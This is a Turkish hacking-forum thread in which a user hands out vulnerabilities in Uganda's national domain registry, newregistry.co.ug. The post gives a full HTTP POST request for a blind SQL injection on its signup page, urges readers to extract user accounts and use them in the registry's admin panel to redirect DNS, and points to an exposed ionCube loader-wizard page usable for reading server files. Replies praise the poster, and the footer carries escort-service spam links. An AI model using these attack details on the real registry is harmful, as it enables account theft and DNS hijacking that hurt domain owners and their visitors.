nic uganda vulnerability

OxSiT

Spys-Z
Katılım
25 Eyl 2012
Mesajlar
278
Tepkime puanı
0
Puanları
0
merhaba arkadaşlar nic uganda ile ilgili gerekli açıkları vericeğim sizde çoğu kişiler gibi googleyi filan hackleyebilirsiniz :) sen neden yapmıyorsun diyenlere eskisi gibi sanal işler bize göre değil artık :)

newregistry.co.ug bling sql injection

POST /hsignup.php HTTP/1.1
Content-Length: 223
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: newregistry.co.ug
Cookie: PHPSESSID=120knlk8rc10mm4m07dj051421; uip=464a278ed0a3bf9edaa8e550068d801a; cartId=120knlk8rc10mm4m07dj051421
Host: newregistry.co.ug
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

bhsld=1&bhtld=1&hwplan=Starter&mhsld=1&mhtld=1&pt=&submit=Next&thsld=1&thtld=1&type=transfer


buradaki sqldan çekiceğiniz user accountları
https://new.registry.co.ug:8006/
bu adreste girerek istediğiniz dns yönlendirmelerini yaparsınız. Sql çekilmiyor demeyin kafanızı kırarım valla :D

gelelim aynı yerdeki diğer açık ise ioncube load wizards açığı bunun ne olduğunu uzun uzun anlatmak isterdim size ama ufak çapta google araştırması yaparak öğrenirsiniz :)

http://newregistry.co.ug/ioncube/loader-wizard.php?page=phpinfo

server dosyalarını okuyup lfi yedirebilirsiniz Hepinize kolay gelsin
 

Genest

Özel Üye
Katılım
12 Ara 2015
Mesajlar
1,008
Tepkime puanı
0
Puanları
0
Yaş
27
Eline sağlık volkan uzun aradan sonra seni görmek güzel :)
 

captainbrain

Prof Spys-z
Katılım
15 Ağu 2015
Mesajlar
1,006
Tepkime puanı
0
Puanları
0
Kral eve döndü :D
 

mersin escort bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort serdivan escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort bursa travesti bursa travesti
Üst
Copyright® Ajanlar.org 2012